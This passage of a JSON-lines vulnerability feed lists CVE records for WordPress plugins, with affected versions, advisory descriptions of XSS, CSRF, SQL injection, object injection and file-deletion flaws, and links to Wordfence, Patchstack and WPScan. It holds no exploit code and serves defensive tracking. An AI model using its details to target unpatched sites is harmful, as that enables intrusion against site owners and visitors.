replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f805982-1141-4e28-b28c-93483646cf99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f805982-1141-4e28-b28c-93483646cf99?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11756","slug":"sweepwidget","versionImpact":"2.0.6","description":"The SweepWidget Contests, Giveaways, Photo Contests, Competitions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sweepwidget' shortcode in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sweepwidget\\\/trunk\\\/sweepwidget.php#L936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sweepwidget\\\/trunk\\\/sweepwidget.php#L936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ec6957-28c0-4441-8801-80b226569df9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ec6957-28c0-4441-8801-80b226569df9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13548","slug":"power-ups-for-elementor","versionImpact":"1.2.2","description":"The Power Ups for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'magic-button' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/power-ups-for-elementor\\\/trunk\\\/modules\\\/magic-buttons-for-elementor\\\/magic_buttons_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/power-ups-for-elementor\\\/trunk\\\/modules\\\/magic-buttons-for-elementor\\\/magic_buttons_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/power-ups-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/power-ups-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7ab552-1ec5-4479-84b9-3e44f6c0354d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7ab552-1ec5-4479-84b9-3e44f6c0354d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13227","slug":"seo-by-rank-math","versionImpact":"1.0.235","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Rank Math API in all versions up to, and including, 1.0.235 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"name\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24df10fb-5143-478e-90f0-27f604ad43ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24df10fb-5143-478e-90f0-27f604ad43ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3097","slug":"wp-time-machine","versionImpact":"3.4.0","description":"The wp Time Machine plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.0. This is due to missing or incorrect nonce validation on the 'wpTimeMachineCore.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-machine\\\/trunk\\\/includes\\\/wpTimeMachineCore.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-machine\\\/trunk\\\/includes\\\/wpTimeMachineCore.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-time-machine\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-time-machine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44fdbb2-abb8-488f-bdc0-ec6eea93d92a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44fdbb2-abb8-488f-bdc0-ec6eea93d92a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11141","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape some of its settings and is missing CSRF protection which could allow subscribers to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fe3544b-fb86-43e4-9771-6e9343f9f835\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fe3544b-fb86-43e4-9771-6e9343f9f835\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5950","slug":"indieblocks","versionImpact":"0.13.2","description":"The IndieBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018kind\u2019 parameter in all versions up to, and including, 0.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/indieblocks\\\/trunk\\\/blocks\\\/facepile-content\\\/render.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/indieblocks\\\/trunk\\\/blocks\\\/facepile-content\\\/render.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/indieblocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/indieblocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41fdb3ea-1de4-4b90-a387-5932de7a5e7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41fdb3ea-1de4-4b90-a387-5932de7a5e7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12612","slug":"school-management","versionImpact":"93.2.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via several parameters across multiple AJAX action in all versions up to, and including, 93.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/258877a7-670c-4a3c-8107-47dc7ba6a5ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/258877a7-670c-4a3c-8107-47dc7ba6a5ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1028","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b978749-7ea5-45f4-9f69-66a19c0e39ca\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b978749-7ea5-45f4-9f69-66a19c0e39ca\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/tags\\\/4.5.4\\\/inc\\\/class.metaseo-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/tags\\\/4.5.4\\\/inc\\\/class.metaseo-admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23710","slug":"miniorange-login-openid","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin <=\u00a07.5.14 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36726","slug":"ultimate-reviews","versionImpact":"2.1.32","description":"The Ultimate Reviews plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.1.32 via deserialization of untrusted input in several vulnerable functions. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2409141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2409141\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db30acd7-ce51-45d9-8ff0-6ceea8237a8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db30acd7-ce51-45d9-8ff0-6ceea8237a8c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-reviews-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-reviews-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2352","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.9.4. This is due to missing or incorrect nonce validation on the chp_abd_action function. This makes it possible for unauthenticated attackers to update or reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5a9cced-0e5e-4b6e-8291-0a862c9f9523?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5a9cced-0e5e-4b6e-8291-0a862c9f9523?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24801","slug":"lgx-owl-carousel","versionImpact":"1.4.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel \u2013 WordPress Owl Carousel Slider allows Stored XSS.This issue affects OWL Carousel \u2013 WordPress Owl Carousel Slider: from n\/a through 1.4.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/lgx-owl-carousel\\\/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/lgx-owl-carousel\\\/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1328","slug":"newsletter2go","versionImpact":"4.0.13","description":"The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 parameter in all versions up to, and including, 4.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766ac399-7280-4186-8972-94da813da85e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766ac399-7280-4186-8972-94da813da85e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/tags\\\/4.0.13\\\/gui\\\/N2Go_Gui.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/tags\\\/4.0.13\\\/gui\\\/N2Go_Gui.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33931","slug":"jw-player-7-for-wp","versionImpact":"2.3.3","description":"Missing Authorization vulnerability in ilGhera JW Player for WordPress.This issue affects JW Player for WordPress: from n\/a through 2.3.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jw-player-7-for-wp\\\/wordpress-jw-player-for-wordpress-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jw-player-7-for-wp\\\/wordpress-jw-player-for-wordpress-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4355","slug":"stopbadbots","versionImpact":"10.24","description":"The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the stopbadbots_get_ajax_data() function in all versions up to, and including, 10.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to expose visitor data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c77d94ae-528d-4525-b16d-96529bee08c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c77d94ae-528d-4525-b16d-96529bee08c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stopbadbots\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stopbadbots\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5856","slug":"comment-images-reloaded","versionImpact":"2.2.1","description":"The Comment Images Reloaded plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the cir_delete_image AJAX action in all versions up to, and including, 2.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary media attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f2dc3e7-1e10-4547-8469-726c6747465d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f2dc3e7-1e10-4547-8469-726c6747465d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comment-images-reloaded\\\/trunk\\\/functions\\\/delete-comment.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comment-images-reloaded\\\/trunk\\\/functions\\\/delete-comment.php#L7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11412","slug":"shine-pdf","versionImpact":"1.0","description":"The Shine PDF Embeder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shinepdf' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shine-pdf\\\/trunk\\\/shine.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shine-pdf\\\/trunk\\\/shine.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455fb4af-47cf-42d5-8232-f00442bca761?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455fb4af-47cf-42d5-8232-f00442bca761?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11339","slug":"smart-popup-blaster","versionImpact":"1.4.3","description":"The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10f391a-6663-4222-8266-ab911c588b76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10f391a-6663-4222-8266-ab911c588b76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13467","slug":"wp-contact-form7-email-spam-blocker","versionImpact":"1.0.0","description":"The WP Contact Form7 Email Spam Blocker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-contact-form7-email-spam-blocker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-contact-form7-email-spam-blocker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b70a1344-2b55-40c9-a314-80d581e0b019?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b70a1344-2b55-40c9-a314-80d581e0b019?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4100","slug":"nautic-pages","versionImpact":"2.0","description":"The Nautic Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'np_marinetraffic_map' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nautic-pages\\\/trunk\\\/nautic_pages.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nautic-pages\\\/trunk\\\/nautic_pages.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f6bfe18-bb9b-4cc2-bdb7-fd9163b61323?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f6bfe18-bb9b-4cc2-bdb7-fd9163b61323?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11140","slug":"real-wp-shop-lite","versionImpact":"2.0.8","description":"The Real WP Shop Lite Ajax eCommerce Shopping Cart WordPress plugin through 2.0.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3448dff-a839-45aa-8d5a-d359e50ab7fd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3448dff-a839-45aa-8d5a-d359e50ab7fd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5939","slug":"telegram-for-wp","versionImpact":"1.6.1","description":"The Telegram for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/telegram-for-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/telegram-for-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf4a3171-f041-40ce-8148-239c24d7ce95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf4a3171-f041-40ce-8148-239c24d7ce95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7359","slug":"counter-visitor-for-woocommerce","versionImpact":"1.3.6","description":"The Counter live visitors for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wcvisitor_get_block function in all versions up to, and including, 1.3.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. NOTE: This particular vulnerability deletes all the files in a targeted arbitrary directory rather than a specified arbitrary file, which can lead to loss of data or a denial of service condition.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-visitor-for-woocommerce\\\/tags\\\/1.3.6\\\/woo-counter-visitor.php#L378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-visitor-for-woocommerce\\\/tags\\\/1.3.6\\\/woo-counter-visitor.php#L378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae13dc61-c4bf-4b17-8055-98c80a853a2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae13dc61-c4bf-4b17-8055-98c80a853a2a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4383","slug":"cbxpetition","versionImpact":"1.0.3","description":"The CBX Petition for WordPress plugin through 1.0.3 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0fe5a53-8ae2-4b67-ac6e-4a8860e39035\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0fe5a53-8ae2-4b67-ac6e-4a8860e39035\",\"refsource\":\"MISC\",\"tags\":[]}]"}
